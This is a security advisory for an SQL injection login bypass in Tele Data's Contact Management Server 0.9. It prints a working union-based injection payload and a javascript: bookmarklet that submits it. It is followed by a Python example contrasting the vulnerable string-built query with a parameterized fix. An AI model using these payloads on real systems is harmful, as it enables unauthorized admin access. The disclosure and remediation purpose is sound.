teledatacms-sql.txt
Posted on 28 April 2010
|=================================================================================================|
|                                                                                                 |
| Vulnerability............SQL Injection                                                          |
| Software.................Tele Data's Contact Management Server 0.9                              |
| Download.................http://teledata.qc.ca/td_cms/TD_CMS_SETUPEX.exe                        |
| Date.....................4/28/10                                                                |
|                                                                                                 |
|=================================================================================================|
|                                                                                                 |
| Site.....................http://cross-site-scripting.blogspot.com/                              |
| Email....................john.leitch5@gmail.com                                                 |
|                                                                                                 |
|=================================================================================================|

##Description##

There isn't much in the way of security here. It's possible to log in with admin privileges by
injecting SQL into the username field. As there are client-side length constraints in place for
the username field, I packaged the exploit in some JavaScript for ease of use.

##Exploit##

' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--

##Proof of Concept##

javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();

|=================================================================================================|
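The advisory's payload works because the username is pasted into the SQL text of the login lookup, so a UNION can append a row whose Password column is empty and whose role column says "admin". The following Python/sqlite3 example is added here and is not part of the advisory or of Tele Data's product: it puts that vulnerable lookup beside a parameterized replacement, using a constructed four-column Users table (the column names Username and Role, the sample rows and the server-side length limit are assumptions; the real table has far more columns, which is why the original payload pads with 23 values). The hardened version also enforces the length limit on the server, since the advisory shows the client-side limit being bypassed with a one-line bookmarklet.

```python
import hmac
import sqlite3

# Constructed stand-in for the product's Users table. Only RecID and Password
# appear in the advisory; Username, Role and the rows below are assumptions.
SCHEMA = """
CREATE TABLE Users (RecID INTEGER PRIMARY KEY, Username TEXT, Password TEXT, Role INTEGER);
INSERT INTO Users VALUES (1, 'admin', 's3cret', 2);
INSERT INTO Users VALUES (2, 'guest', 'guest', 0);
"""
MAX_USERNAME_LEN = 32  # assumed server-side limit; the page only shows a client-side one


def open_db():
    """Return an in-memory SQLite database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username, password):
    """Look up the user with string-concatenated SQL, then compare the stored password.

    The username becomes part of the SQL text, so a quote closes the literal and a
    UNION can append a row whose Password column the caller chose ('' in the
    advisory's payload) and whose Role column marks it as admin. This is the bug
    class the advisory describes, reproduced on the toy schema.
    """
    sql = ("SELECT RecID, Username, Password, Role FROM Users "
           f"WHERE Username = '{username}'")
    row = conn.execute(sql).fetchone()
    if row is None or row[2] != password:
        return None
    return {"RecID": row[0], "Role": row[3]}


def login_safe(conn, username, password):
    """Same lookup with a bound parameter: the input is data, never SQL.

    The length check lives here, on the server; the client-side limit the
    advisory mentions is trivially removed from the browser.
    """
    if not isinstance(username, str) or len(username) > MAX_USERNAME_LEN:
        return None
    row = conn.execute(
        "SELECT RecID, Username, Password, Role FROM Users WHERE Username = ?",
        (username,),
    ).fetchone()
    # Constant-time comparison; a real deployment compares against a password hash,
    # the plaintext column here only keeps the toy short.
    if row is None or not hmac.compare_digest(row[2].encode(), password.encode()):
        return None
    return {"RecID": row[0], "Role": row[3]}


if __name__ == "__main__":
    db = open_db()
    # Shape of the advisory's payload, reduced to the constructed table's four columns.
    payload = "' OR 1=0 UNION SELECT 1, 'x', '', 2 FROM Users WHERE 'a'='a"
    print("vulnerable:", login_vulnerable(db, payload, ""))  # admin session, no password
    print("safe:      ", login_safe(db, payload, ""))        # None
```

Run stand-alone, the vulnerable function hands back an admin session for an empty password while the parameterized one returns None; the same payload simply fails to match any username once it is bound as a parameter rather than spliced into the statement.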